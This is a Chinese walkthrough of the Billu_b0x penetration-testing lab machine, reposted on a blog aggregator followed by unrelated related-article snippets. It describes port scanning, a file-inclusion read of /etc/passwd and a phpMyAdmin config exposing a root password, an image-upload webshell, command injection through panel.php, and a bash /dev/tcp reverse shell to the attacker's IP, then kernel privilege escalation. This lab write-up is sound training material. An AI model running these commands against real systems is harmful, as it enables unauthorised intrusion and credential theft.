靶机-Billu_b0x root 123456

这篇具有很好参考价值的文章主要介绍了靶机-Billu_b0x root 123456。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

查找靶机IP
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
nmap查看开放端口22,80
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
目录扫描
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

查看网站,典型注入
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

phpmy

果然是登陆界面,不过不知道账户及密码
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

in.php

php的配置信息,可以看看
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

add.php

上传文件目录,可以上传,不过没有回显
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

其他页面

show.php和c.php访问页面空白

文件目录

/uploaded_images/
果然如此,刚才上传失败了
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

文件包含漏洞

访问test.php
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
得到以下界面
翻译结果:“file”参数为空。请在“file”参数中提供文件路径
需要一个参数,可能存在文件包含漏洞
POST方法成功注入
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
最后一个id 1000为ica的也有ssh连接权限

靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
下载其他文件
asswd可以下载,shadow无法下载。前面说过有phpmyadmin,可以下载以下它的配置文件
file=/var/www/phpmy/config.inc.php
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
里面有用户名和密码
$cfg’Servers’[‘user’] = ‘root’;
$cfg’Servers’[‘password’] = ‘roottoor’;
ssh直接登录

回到网站,使用burp模糊注入测试
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
跳转到
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
利用kali上shell
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
需要修改 反弹代理 里面 ip
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
上传成功
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
访问之前的图片路径
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
查看权限
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
提权
内核漏洞提权
python -c ‘import pty;pty.spawn(’/bin/bash’)’
uname -a
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
查找内核漏洞
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
放到www目录下,开启apache服务
service apache2 start
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试

网页显示上传失败。换一种思路,上传一张正常图片并在burp中抓包,在图片末尾加入
接下来还是使用burp,在URL的post请求中加入POST /panel.php?cmd=cat%20/etc/passwd;ls,正文中加入load=/uploaded_images/apple233.png&continue=continue
靶机-Billu_b0x root 123456,靶机,网络,安全,靶机,渗透测试
kali命令行里输入nc -lvnp 9999开始监听,同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.253.136/99990>&1” | bash,注意要将此命令先经过URL编码才能发送文章来源地址https://www.toymoban.com/news/detail-805826.html

到了这里,关于靶机-Billu_b0x root 123456的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • mysql远程连接权限grant all privileges on *.* to ‘root‘@‘%‘ identified by ‘123456‘ with grant optio语句报错

    在docker上创建mysql之后被外界拒绝访问 查看了docker上的mysql连接并没有什么问题 但就是一直报错,查了半天说是需要外界连接授权 也就是 查了很久之后看到有说mysql8.0之后其实用的不是这样的sql 只需要按照步骤执行代码即可! 最后记得权限更新 问题就全部解决了!

    2024年02月12日
    浏览(39)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(43)
  • PWNlab靶机渗透

    安装靶机 下载地址:https://www/vulnhub.com/entry/pwnlab-init,158/ 收集靶机ip地址,由于搭建在本地使用kali自带命令 arp-scan -l nmap 扫描端口,服务 nmap -sV -p 1-65535 -A 靶机ip地址   访问80端口地址,查找可利用的功能点 发现存在upload,不过需要登录 发现一个规律每次切换网页时,存在p

    2024年02月13日
    浏览(29)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(36)
  • 网络安全技术新手入门:利用永恒之蓝获取靶机控制权限

    目录 前言 一、搜索永恒之蓝可用模块 二、使用攻击模块 三、配置攻击模块 四、攻击 五、总结 相关法律声明:《中华人民共和国网络安全法》 第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供

    2024年01月20日
    浏览(37)
  • 靶机渗透(五)——metasploitable2

    metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 : msfadmin 密码是: msfadmin 开放了好多端口 大致过程 在kali中执行msfconsole,启动metasploit search irc,选择模块

    2024年02月05日
    浏览(53)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • DarkHole_1靶机渗透流程

    注意:部署时,靶机的网络连接模式必须和kali一致,让靶机跟kali处于同一网段,这用kali才能扫出靶机的主机 1.1 探测IP 使用nmap扫描同一个段下存活的IP 发现192.168.157.138开放了80端口,访问后确认为此次渗透的靶机 1.2 详细信息扫描 -A:启用操作系统探测与版本检测、脚本扫描

    2024年02月06日
    浏览(40)
  • 内网渗透代理知识以及渗透某CTF三层靶机实例

            在学习完小迪内网代理安全知识后,自己也找来了案例中的CTF比赛中三层靶机,来总结一下内网代理知识。实验中成功拿到三个flag,话不多说,现在就开始。 文章目录 前言 一、 内网代理知识 二 、CTF三层靶机实例 1. 靶机拓补图 2. 攻击目标1 3.添加路由 4.开启代

    2024年02月03日
    浏览(37)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包